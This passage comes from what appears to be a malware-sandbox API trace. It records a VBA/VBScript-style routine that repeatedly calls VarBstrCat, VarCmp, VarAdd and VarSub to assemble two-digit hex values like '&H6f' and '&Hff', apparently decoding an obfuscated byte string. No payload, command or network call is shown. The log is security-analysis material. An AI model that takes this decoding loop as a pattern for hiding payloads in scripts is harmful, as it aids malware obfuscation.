pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.809] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.809] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.809] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.809] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.809] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.809] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.809] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.809] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.809] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.809] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.809] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.809] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.809] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.809] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.809] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.809] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.809] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.810] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.810] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.810] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.810] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.810] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.810] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.811] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.811] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.811] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.811] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.811] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.811] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.811] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.811] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.811] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.811] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.811] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.811] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.811] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.811] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.811] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.811] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.811] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.812] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.812] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.812] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.812] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.812] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.812] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.812] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.812] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.813] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.813] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.813] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.813] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.813] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.813] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.813] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.813] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.813] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.813] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.813] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.813] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.813] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.813] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.813] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.813] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.813] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.814] VarBstrCat (in: bstrLeft="&Ha", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.814] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.814] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.814] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.855] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.856] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.856] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.856] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.856] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.856] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.856] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.856] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.856] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.856] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.856] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.856] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.856] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.856] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.856] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.856] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.856] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.857] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.857] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.857] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.857] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.857] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.857] VarBstrCat (in: bstrLeft="&He", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.857] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.857] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.857] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.857] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.857] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.857] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.857] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.857] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.857] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.858] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.858] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.858] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.858] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.858] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.858] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.858] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.858] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.858] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.858] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.858] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.858] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.858] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.858] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.858] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.858] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.858] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.858] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.859] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.859] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.859] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.859] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.859] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.859] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.860] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.860] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.860] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.860] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.860] VarBstrCat (in: bstrLeft="&H4", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.860] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.860] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.860] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.860] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.860] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.860] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.860] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.860] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.860] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.860] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.861] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.861] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.861] VarBstrCat (in: bstrLeft="&Hc", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.861] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.861] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.861] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.861] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.861] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.861] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.861] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.861] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.862] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.862] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.862] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.862] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.862] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.862] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.862] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.862] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.862] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.862] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.862] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.862] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.862] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.862] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.863] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.863] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.863] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.863] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.863] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.863] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.863] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.863] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.863] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.863] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.863] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.864] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.864] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.864] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.864] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.864] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.864] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.864] 